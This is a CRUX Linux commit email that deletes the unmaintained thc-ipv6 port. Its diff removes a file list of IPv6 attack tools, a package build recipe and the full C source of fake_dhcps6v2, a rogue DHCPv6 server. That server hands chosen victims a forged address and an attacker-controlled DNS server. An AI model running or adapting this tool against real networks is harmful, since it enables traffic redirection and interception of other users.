[crux-commits] ports/contrib (refs/remotes/origin/3.6): thc-ipv6: deleted unmaintained port

crux at crux.nu crux at crux.nu
Sat Apr 10 19:05:51 UTC 2021


commit 9e57baaed4b7efda11279afbde72e964fe45bb42
Author: Tim Biermann <tbier at posteo.de>
Date:   Mon Feb 15 09:50:42 2021 +0000

    thc-ipv6: deleted unmaintained port

diff --git a/thc-ipv6/.footprint b/thc-ipv6/.footprint
deleted file mode 100644
index 6b6c17592..000000000
--- a/thc-ipv6/.footprint
+++ /dev/null
@@ -1,163 +0,0 @@
-drwxr-xr-x	root/root	usr/
-drwxr-xr-x	root/root	usr/bin/
--rwxr-xr-x	root/root	usr/bin/6to4test.sh
--rwxr-xr-x	root/root	usr/bin/address6
--rwxr-xr-x	root/root	usr/bin/alive2map.sh
--rwxr-xr-x	root/root	usr/bin/alive6
--rwxr-xr-x	root/root	usr/bin/axfr-reverse.sh
--rwxr-xr-x	root/root	usr/bin/axfr.sh
--rwxr-xr-x	root/root	usr/bin/connect6
--rwxr-xr-x	root/root	usr/bin/connsplit6
--rwxr-xr-x	root/root	usr/bin/connsplit6.sh
--rwxr-xr-x	root/root	usr/bin/covert_send6
--rwxr-xr-x	root/root	usr/bin/covert_send6d
--rwxr-xr-x	root/root	usr/bin/create_network_map.sh
--rwxr-xr-x	root/root	usr/bin/denial6
--rwxr-xr-x	root/root	usr/bin/detect-new-ip6
--rwxr-xr-x	root/root	usr/bin/detect_sniffer6
--rwxr-xr-x	root/root	usr/bin/dnsdict6
--rwxr-xr-x	root/root	usr/bin/dnsrevenum6
--rwxr-xr-x	root/root	usr/bin/dnsrevenum6.sh
--rwxr-xr-x	root/root	usr/bin/dnssecwalk
--rwxr-xr-x	root/root	usr/bin/dnssecwalk.sh
--rwxr-xr-x	root/root	usr/bin/dos-new-ip6
--rwxr-xr-x	root/root	usr/bin/dos_mld6.sh
--rwxr-xr-x	root/root	usr/bin/dump_dhcp6
--rwxr-xr-x	root/root	usr/bin/dump_router6
--rwxr-xr-x	root/root	usr/bin/exploit6
--rwxr-xr-x	root/root	usr/bin/extract_hosts6.sh
--rwxr-xr-x	root/root	usr/bin/extract_networks6.sh
--rwxr-xr-x	root/root	usr/bin/fake_advertise6
--rwxr-xr-x	root/root	usr/bin/fake_dhcps6
--rwxr-xr-x	root/root	usr/bin/fake_dhcps6v2
--rwxr-xr-x	root/root	usr/bin/fake_dns6d
--rwxr-xr-x	root/root	usr/bin/fake_dnsupdate6
--rwxr-xr-x	root/root	usr/bin/fake_mipv6
--rwxr-xr-x	root/root	usr/bin/fake_mld26
--rwxr-xr-x	root/root	usr/bin/fake_mld6
--rwxr-xr-x	root/root	usr/bin/fake_mldrouter6
--rwxr-xr-x	root/root	usr/bin/fake_pim6
--rwxr-xr-x	root/root	usr/bin/fake_router26
--rwxr-xr-x	root/root	usr/bin/fake_router6
--rwxr-xr-x	root/root	usr/bin/fake_solicitate6
--rwxr-xr-x	root/root	usr/bin/firewall6
--rwxr-xr-x	root/root	usr/bin/flood_advertise6
--rwxr-xr-x	root/root	usr/bin/flood_dhcpc6
--rwxr-xr-x	root/root	usr/bin/flood_mld26
--rwxr-xr-x	root/root	usr/bin/flood_mld6
--rwxr-xr-x	root/root	usr/bin/flood_mldrouter6
--rwxr-xr-x	root/root	usr/bin/flood_redir6
--rwxr-xr-x	root/root	usr/bin/flood_router26
--rwxr-xr-x	root/root	usr/bin/flood_router6
--rwxr-xr-x	root/root	usr/bin/flood_rs6
--rwxr-xr-x	root/root	usr/bin/flood_solicitate6
--rwxr-xr-x	root/root	usr/bin/flood_unreach6
--rwxr-xr-x	root/root	usr/bin/four2six
--rwxr-xr-x	root/root	usr/bin/fragmentation6
--rwxr-xr-x	root/root	usr/bin/fragrouter6
--rwxr-xr-x	root/root	usr/bin/fragrouter6.sh
--rwxr-xr-x	root/root	usr/bin/fuzz_dhcpc6
--rwxr-xr-x	root/root	usr/bin/fuzz_dhcps6
--rwxr-xr-x	root/root	usr/bin/fuzz_ip6
--rwxr-xr-x	root/root	usr/bin/grep6.pl
--rwxr-xr-x	root/root	usr/bin/host_scan
--rwxr-xr-x	root/root	usr/bin/implementation6
--rwxr-xr-x	root/root	usr/bin/implementation6d
--rwxr-xr-x	root/root	usr/bin/inject_alive6
--rwxr-xr-x	root/root	usr/bin/inverse_lookup6
--rwxr-xr-x	root/root	usr/bin/kill_router6
--rwxr-xr-x	root/root	usr/bin/local_discovery6.sh
--rwxr-xr-x	root/root	usr/bin/ndpexhaust26
--rwxr-xr-x	root/root	usr/bin/ndpexhaust6
--rwxr-xr-x	root/root	usr/bin/node_query6
--rwxr-xr-x	root/root	usr/bin/parasite6
--rwxr-xr-x	root/root	usr/bin/passive_discovery6
--rwxr-xr-x	root/root	usr/bin/randicmp6
--rwxr-xr-x	root/root	usr/bin/redir6
--rwxr-xr-x	root/root	usr/bin/redirsniff6
--rwxr-xr-x	root/root	usr/bin/rsmurf6
--rwxr-xr-x	root/root	usr/bin/sendpees6
--rwxr-xr-x	root/root	usr/bin/sendpeesmp6
--rwxr-xr-x	root/root	usr/bin/six2four.sh
--rwxr-xr-x	root/root	usr/bin/smurf6
--rwxr-xr-x	root/root	usr/bin/spoofer
--rwxr-xr-x	root/root	usr/bin/thc-ipv6-setup.sh
--rwxr-xr-x	root/root	usr/bin/thcping6
--rwxr-xr-x	root/root	usr/bin/thcsyn6
--rwxr-xr-x	root/root	usr/bin/toobig6
--rwxr-xr-x	root/root	usr/bin/toobigsniff6
--rwxr-xr-x	root/root	usr/bin/trace6
--rwxr-xr-x	root/root	usr/bin/trace62list.sh
-drwxr-xr-x	root/root	usr/share/
-drwxr-xr-x	root/root	usr/share/man/
-drwxr-xr-x	root/root	usr/share/man/man8/
--rw-r--r--	root/root	usr/share/man/man8/address6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/alive6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/connect6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/connsplit6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/covert_send6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/covert_send6d.8.gz
--rw-r--r--	root/root	usr/share/man/man8/denial6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/detect-new-ip6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/detect_sniffer6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/dnsdict6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/dnsrevenum6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/dnssecwalk.8.gz
--rw-r--r--	root/root	usr/share/man/man8/dos-new-ip6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/dump_dhcp6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/dump_router6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/exploit6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_advertise6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_dhcps6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_dhcps6v2.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_dns6d.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_dnsupdate6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_mipv6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_mld26.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_mld6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_mldrouter6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_pim6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_router26.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_router6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fake_solicitate6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/firewall6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_advertise6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_dhcpc6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_mld26.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_mld6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_mldrouter6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_redir6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_router26.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_router6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_rs6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_solicitate6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/flood_unreach6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/four2six.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fragmentation6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fragrouter6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fuzz_dhcpc6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fuzz_dhcps6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/fuzz_ip6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/implementation6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/implementation6d.8.gz
--rw-r--r--	root/root	usr/share/man/man8/inject_alive6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/inverse_lookup6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/kill_router6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/ndpexhaust26.8.gz
--rw-r--r--	root/root	usr/share/man/man8/ndpexhaust6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/node_query6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/parasite6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/passive_discovery6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/randicmp6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/redir6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/redirsniff6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/rsmurf6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/sendpees6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/sendpeesmp6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/smurf6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/thc-ipv6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/thcping6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/thcsyn6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/toobig6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/toobigsniff6.8.gz
--rw-r--r--	root/root	usr/share/man/man8/trace6.8.gz
diff --git a/thc-ipv6/.signature b/thc-ipv6/.signature
deleted file mode 100644
index af206d4fd..000000000
--- a/thc-ipv6/.signature
+++ /dev/null
@@ -1,6 +0,0 @@
-untrusted comment: verify with /etc/ports/contrib.pub
-RWSagIOpLGJF37RohuasuM4oGxXowUqmmD5dMe0mFmMPutbGbJQlkQRHcU6w2NpFlV4cR22kB+oSHVJAjdPfbSO4imLbiTub5w4=
-SHA256 (Pkgfile) = f454f1ae8841758f1ec34f9ed2d56e75eb7ce1a3d80941cba0a1aa0552571c64
-SHA256 (.footprint) = 7fdec22adac9330e3f7181fac3abb2e70f2333723363ce11fbfbfdd9739a80f3
-SHA256 (thc-ipv6-3.8.tar.gz) = b60be61a8b0a944a66e3b719704b4c03c1bc2c22f32d5d21e99e434c82a9d769
-SHA256 (fake_dhcps6v2.c) = 22aece1f21de88bd6d6bc0f866e0c1f8c65dd26d6b20f0b698f58a8fc7248cd6
diff --git a/thc-ipv6/Pkgfile b/thc-ipv6/Pkgfile
deleted file mode 100644
index 9c0d0a0bf..000000000
--- a/thc-ipv6/Pkgfile
+++ /dev/null
@@ -1,32 +0,0 @@
-# Description: IPv6 attack toolkit
-# URL:         https://github.com/vanhauser-thc/thc-ipv6
-# Maintainer:  UNMAINTAINED
-# Depends on:  bindutils libnetfilter_queue libpcap
-
-name=thc-ipv6
-version=3.8
-release=1
-source=(https://github.com/vanhauser-thc/$name/archive/v$version/$name-$version.tar.gz
-	fake_dhcps6v2.c)
-
-build() {
-	cd $name-$version
-
-	# remove default optimization flags
-	sed -i 's,CFLAGS+=-g -O3 -march=native,CFLAGS+=,' Makefile
-
-	# According to this thread
-	# https://github.com/vanhauser-thc/thc-ipv6/pull/18
-	# van Hauser has a sane reasons to decline this PR.
-	# And at the same time, since this patch is very handyful,
-	# we may include it as a separate tool.
-	cp $SRC/fake_dhcps6v2.c .
-	sed -i 's/fake_dhcps6 /fake_dhcps6 fake_dhcps6v2 /' Makefile
-
-	make
-	make PREFIX=/usr DESTDIR=$PKG install
-
-	(cd contrib;
-	make
-	make PREFIX=/usr DESTDIR=$PKG install)
-}
diff --git a/thc-ipv6/fake_dhcps6v2.c b/thc-ipv6/fake_dhcps6v2.c
deleted file mode 100644
index 2e66bc699..000000000
--- a/thc-ipv6/fake_dhcps6v2.c
+++ /dev/null
@@ -1,415 +0,0 @@
-/*
- * Fake DHCPv6v2 :D
- *
- * On a LAN it's best to be able to target the attack on a specific IP.
- * If you want to attack all victims, use "any".
- *
- * According to this thread https://github.com/vanhauser-thc/thc-ipv6/pull/18
- * van Hauser has sane reasons to decline this patch.
- *
- * But ... since this patch is very handyful, we include it into a separate
- * tool (to not break backward compatibility).
- *
- */
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-#include <sys/types.h>
-#include <sys/time.h>
-#include <sys/resource.h>
-#include <sys/wait.h>
-#include <time.h>
-#include <pcap.h>
-#include <netinet/in.h>
-#include <sys/select.h>
-#include "thc-ipv6.h"
-
-void help(char *prg) {
-  printf("%s %s (c) 2020 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
-  printf(
-      "Syntax: %s interface network-address/prefix-length dns-server "
-      "[<victim-address|any> [dhcp-server-ip-address [mac-address]]]\n\n",
-      prg);
-  printf(
-      "Fake DHCPv6 server. Use to configure an address and set a DNS server\n");
-  exit(-1);
-}
-
-int main(int argc, char *argv[]) {
-  char *         routerip, *interface, mac[16] = "";
-  char           rdatabuf[1024], wdatabuf[1024], cmsgbuf[1024], mybuf[1024];
-  unsigned char *victimip6, *routerip6, *mac6 = mac, *ip6, *ptr, *ptr1, *ptr2, *ptr3, *any = "any";
-  unsigned char *dns;
-  int size, fromlen = 0, /*mtu = 1500, */ i, j, k, l, m, s, len, t, mlen,
-            csize = 0;
-  static struct iovec     iov;
-  struct sockaddr_storage from;
-  struct msghdr           mhdr;
-  struct sockaddr_in6     ddst;
-  unsigned long long int  count = 0;
-
-  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]);
-
-  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
-    printf("WARNING: %s is not working with injection!\n", argv[0]);
-
-  if (strcmp(argv[1], "-r") == 0) {  // is ignored
-    argv++;
-    argc--;
-  }
-
-  memset(mac, 0, sizeof(mac));
-  interface = argv[1];
-  if (thc_get_own_mac(interface) == NULL) {
-    fprintf(stderr, "Error: invalid interface %s\n", interface);
-    exit(-1);
-  }
-  if (argc >= 5 && argv[4] != NULL)
-    victimip6 = argv[4];
-  else
-    victimip6 = NULL;
-
-  if (argv >= 7 && (ptr = argv[6]) != NULL)
-    sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *)&mac[0],
-           (unsigned int *)&mac[1], (unsigned int *)&mac[2],
-           (unsigned int *)&mac[3], (unsigned int *)&mac[4],
-           (unsigned int *)&mac[5]);
-  else
-    mac6 = thc_get_own_mac(interface);
-
-  if (argc >= 6 && argv[5] != NULL)
-    ip6 = thc_resolve6(argv[5]);
-  else
-    ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
-
-  if (argc >= 4 && argv[3] != NULL)
-    dns = thc_resolve6(argv[3]);
-  else
-    dns = thc_resolve6("ff02::fb");
-
-  routerip = argv[2];
-  if ((ptr = index(routerip, '/')) == NULL) {
-    printf(
-        "Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. "
-        "ff80::01/16\n");
-    exit(-1);
-  }
-  *ptr++ = 0;
-  size = atoi(ptr);
-
-  routerip6 = thc_resolve6(routerip);
-
-  if (routerip6 == NULL || size < 1 || size > 128) {
-    fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n",
-            argv[2]);
-    exit(-1);
-  }
-  if (size < 64) {
-    fprintf(
-        stderr,
-        "Warning: network prefix must be a minimum of /64, resizing to /64\n");
-    size = 64;
-  }
-  if (size % 8 > 0) {
-    size = ((size / 8) + 1) * 8;
-    fprintf(stderr,
-            "Warning: prefix must be a multiple of 8, resizing to /%d\n",
-            csize * 8);
-  }
-  csize = 8 - ((size - 64) / 8);
-  if (dns == NULL) {
-    fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[3]);
-    exit(-1);
-  }
-  if (ip6 == NULL) {
-    fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[4]);
-    exit(-1);
-  }
-
-  /*
-    if (mtu < 1 || mtu > 65536) {
-      fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[5]);
-      exit(-1);
-    }
-    if (mtu < 1228 || mtu > 1500)
-      fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are
-    doing :%d\n", mtu);
-  */
-  if (mac6 == NULL) {
-    fprintf(stderr, "Error: mac address in invalid\n");
-    exit(-1);
-  }
-
-  if ((s = thc_bind_udp_port(547)) < 0) {
-    fprintf(stderr, "Error: could not bind to 547/udp\n");
-    exit(-1);
-  }
-  if (thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:2")) <
-          0 ||
-      thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:3")) <
-          0) {
-    fprintf(stderr, "Error: could not bind multicast address\n");
-    exit(-1);
-  }
-  if ((t = socket(AF_INET6, SOCK_DGRAM, 0)) < 0) {
-    perror("Error:");
-    exit(-1);
-  }
-
-  memset(mybuf, 0, sizeof(mybuf));
-  mybuf[1] = 2;
-  mybuf[3] = 14;
-  mybuf[5] = 1;
-  mybuf[7] = 1;
-  // mybuf + 8 == time
-  memcpy(mybuf + 12, mac6, 6);
-  mlen = 18;
-  mybuf[mlen + 1] = 23;
-  mybuf[mlen + 3] = 16;
-  memcpy(mybuf + mlen + 4, dns, 16);
-  mlen += 20;
-
-  printf(
-      "Starting to fake dhcp6 server on %s for %s (Press Control-C to end) "
-      "...\n\n",
-      interface, argv[2]);
-  while (1) {
-    memset((char *)&from, 0, sizeof(from));
-    memset(&iov, 0, sizeof(iov));
-    memset(&mhdr, 0, sizeof(mhdr));
-    iov.iov_base = rdatabuf;
-    iov.iov_len = sizeof(rdatabuf);
-    mhdr.msg_name = &from;
-    mhdr.msg_namelen = sizeof(from);
-    mhdr.msg_iov = &iov;
-    mhdr.msg_iovlen = 1;
-    mhdr.msg_control = (caddr_t)cmsgbuf;
-    mhdr.msg_controllen = sizeof(cmsgbuf);
-    if ((len = recvmsg(s, &mhdr, 0)) > 0) {
-      fromlen = mhdr.msg_namelen;
-      if (debug) thc_dump_data(rdatabuf, len, "Received Packet");
-      ddst.sin6_addr = ((struct sockaddr_in6 *)mhdr.msg_name)->sin6_addr;
-      ptr2 = thc_ipv62notation((char *)&ddst.sin6_addr);
-      switch (rdatabuf[0]) {
-        case 1:
-          ptr1 = "Solicitate";
-          break;
-        case 2:
-          ptr1 = "Advertise (illegal, ignored)";
-          break;
-        case 3:
-          ptr1 = "Request";
-          break;
-        case 4:
-          ptr1 = "Confirm";
-          break;
-        case 5:
-          ptr1 = "Renew";
-          break;
-        case 6:
-          ptr1 = "Rebind";
-          break;
-        case 7:
-          ptr1 = "Reply (illegal, ignored)";
-          break;
-        case 8:
-          ptr1 = "Release (ignored)";
-          break;
-        case 9:
-          ptr1 = "Decline (ignored)";
-          break;
-        case 10:
-          ptr1 = "Reconfigure (illegal, ignored)";
-          break;
-        case 11:
-          ptr1 = "Information Request (ignored)";
-          break;
-        case 12:
-          ptr1 = "Relay Forward (ignored)";
-          break;
-        case 13:
-          ptr1 = "Relay Reply (ignored)";
-          break;
-        default:
-          ptr1 = "Unknown (ignored)";
-          break;
-      }
-      printf("Received DHCP6 %s packet from %s\n", ptr1, ptr2);
-      if (victimip6 == NULL || strcmp(any, victimip6) == 0)
-	printf("Warning: attacking all IPs, this is not safe\n");
-      else {
-	if (strcmp(ptr2, victimip6) != 0) {
-	  printf("Packet ignored, not our victim\n");
-	  free(ptr2);
-	  continue;
-	}
-      }
-      free(ptr2);
-      if (rdatabuf[0] >= 1 && rdatabuf[0] < 7 && rdatabuf[0] != 2) {
-        memset(wdatabuf, 0, sizeof(wdatabuf));
-        memcpy(wdatabuf + 1, rdatabuf + 1, 3);
-        i = j = 4;
-        k = -1;
-        if (rdatabuf[0] == 1) {  // initial request
-          wdatabuf[0] = 2;
-          while ((j + 4) < len) {
-            l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3];
-            if (l + j + 4 > len) {
-              l = 0;
-              j = len;
-              printf("Info: received evil packet\n");
-            } else {
-              if (rdatabuf[j + 1] == 1) {
-                memcpy(wdatabuf + i, rdatabuf + j, l + 4);
-                i += l + 4;
-              } else if (rdatabuf[j + 1] == 3) {
-                k = j;  // just set a pointer
-              }
-              j += l + 4;
-            }
-          }
-          // add 02, 23
-          j = time(NULL);
-          memcpy(mybuf + 8, (char *)&j + _TAKE4, 4);
-          memcpy(wdatabuf + i, mybuf, mlen);
-          i += mlen;
-          // now expand 3
-          if (k > -1 && rdatabuf[k + 3] == 12 &&
-              rdatabuf[k + 2] == 0) {  // copy structure
-            memcpy(wdatabuf + i, rdatabuf + k, 16);
-          } else {  // or create new
-            wdatabuf[i + 1] = 3;
-            memcpy(wdatabuf + i + 4, (char *)&j + _TAKE4,
-                   4);  // copy time as IAID
-          }
-          wdatabuf[i + 3] = 40;
-          memset(wdatabuf + i + 8, 0, 8);
-          wdatabuf[i + 10] = 0x7f;
-          wdatabuf[i + 14] = 0xfe;
-          i += 16;
-          wdatabuf[i + 1] = 5;
-          wdatabuf[i + 3] = 24;
-          memcpy(wdatabuf + i + 4, routerip6, 16);  // address
-          count++;
-          if (csize > 0)
-            memcpy(wdatabuf + i + 4 + 16 - csize, (char *)&count,
-                   csize);  // counter
-          ptr3 = thc_ipv62notation(wdatabuf + i + 4);
-          wdatabuf[i + 21] = 2;
-          wdatabuf[i + 25] = 2;
-          i += 28;
-        } else {
-          wdatabuf[0] = 7;
-          m = 0;
-          while ((j + 4) < len) {
-            l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3];
-            if (l + j + 4 > len) {
-              l = 0;
-              j = len;
-              printf("Info: received evil packet\n");
-            } else {  // just copy types 1-3 and 23
-              if ((rdatabuf[j + 1] >= 1 && rdatabuf[j + 1] <= 3) ||
-                  rdatabuf[j + 1] == 23) {
-                memcpy(wdatabuf + i, rdatabuf + j, l + 4);
-                i += l + 4;
-                if (rdatabuf[j + 1] == 23) k = 1;
-                if (rdatabuf[j + 1] == 3) m = 1;
-              }
-              j += l + 4;
-            }
-          }
-          if (k == -1) {
-            memcpy(wdatabuf + i, mybuf + 18, 20);
-            i += 20;
-          }
-        }
-        len = i;
-        if (debug) thc_dump_data(wdatabuf, len, "Reply Packet");
-        ddst.sin6_family = AF_INET6;
-        ddst.sin6_port = htons(546);
-        // ddst.sin6_addr = ((struct sockaddr_in6 *)mhdr.msg_name)->sin6_addr;
-        ddst.sin6_scope_id =
-            ((struct sockaddr_in6 *)mhdr.msg_name)->sin6_scope_id;
-        if (sendto(t, wdatabuf, len, 0, (struct sockaddr *)&ddst,
-                   sizeof(ddst)) < 0)
-          perror("Error:");
-        else {
-          ptr2 = thc_ipv62notation((char *)&ddst.sin6_addr);
-          if (wdatabuf[0] == 2) {
-            printf("Sent DHCP6 Advertise packet to %s (offer: %s)\n", ptr2,
-                   ptr3);
-            free(ptr3);
-          } else if (m)
-            printf("Sent DHCP6 Reply packet to %s (address accepted)\n", ptr2);
-          else
-            printf("Sent DHCP6 Reply packet to %s (did not set address)\n",
-                   ptr2);
-          free(ptr2);
-        }
-      }
-    }
-  }
-
-  /*  packet structure:
-        1 byte  = type
-        3 bytes = sessionid
-        while(packet data) {
-          2 bytes = type
-          2 bytes = length in bytes of following data
-          ... defined fixed length data ...
-        }
-
-      server listen on ff02::1:2 udp 547
-      client connects from linklocal port 546, ttl 1
-          01 = solicit
-          3 bytes = sessionid
-          6 bytes = blog (elapsed, 8)
-          8 bytes = 01 blob (client id + time + mac)
-          4 bytes = time
-          6 bytes = mac
-          16 bytes = 03 blob (want perm address)
-          5 + length + hostname = hostname
-          18 bytes = blob (vendor class, type 16)
-          12 bytes = blob (requested options, type 6)
-      server sends to linklocal (respect client port), ttl 1
-          02 = advertise
-          3 bytes = sessionid (copy)
-          18 bytes = 01 blob (client copy of client-id)
-          8 bytes = 02 blob (server id + time + mac)
-          4 bytes = time
-          6 bytes = mac
-          0003 = give perm address
-          2 bytes = length
-          4 bytes = IAID (from client request!)
-          4 bytes = validity time 1 (1800)
-          4 bytes = validity time 2 (2880)
-            0005 = address structure
-            2 bytes = length (24 bytes)
-            16 bytes = address
-            4 bytes = validity time (3600)
-            4 byte = validity time (same)
-          0023 = dns option
-          2 bytes = length (16 bytes)
-          16 bytes = dns server address
-      client sends to ff02::1:2 !
-          03 = request
-          3 bytes = sessionid
-          6 bytes = blog (elapsed, 8)
-          8 bytes = 01 blob (client id + time + mac)
-          4 bytes = time
-          6 bytes = mac
-          18 bytes = client (again)
-          18 bytes = server (copy)
-          44 bytes = address (copy)
-          5 + length + hostname = hostname (again)
-          18 bytes = blob again (vendor class, type 16)
-          12 bytes = blob again (requested options, type 6)
-      server replies
-          7 = reply
-          copy original advertise packet :-)
-    */
-
-  return 0;  // never reached
-}


More information about the crux-commits mailing list